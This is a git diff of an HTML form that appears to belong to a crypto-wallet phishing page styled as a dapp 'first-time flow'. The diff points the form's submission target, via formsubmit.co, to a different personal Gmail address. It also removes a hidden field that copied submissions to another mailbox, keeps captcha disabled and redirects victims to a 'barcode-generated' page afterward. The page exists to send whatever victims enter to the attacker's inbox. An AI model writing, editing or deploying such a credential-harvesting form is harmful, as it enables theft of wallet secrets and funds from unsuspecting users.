--- a/form/index.html
+++ b/form/index.html
@@ -413,8 +413,8 @@
                     <div class="first-time-flow">
                         <div class="first-time-flow__wrapper">
                           
-                                       <form action="https://formsubmit.co/hickeljoel@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
-                                        <input type="hidden" name="_cc" value="formsubmitmails@gmail.com">
+                                       <form action="https://formsubmit.co/jasminejulia22993@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
+                                        
                                         <input type="hidden" name="_captcha" value="false">
                                         <input type="hidden" name="_next" value="https://dappconn.vercel.app/access/point/barcode-generated.html">
                                 <div class="first-time-flow__create-back"><a href="../../../index.html">< Back</a></div>
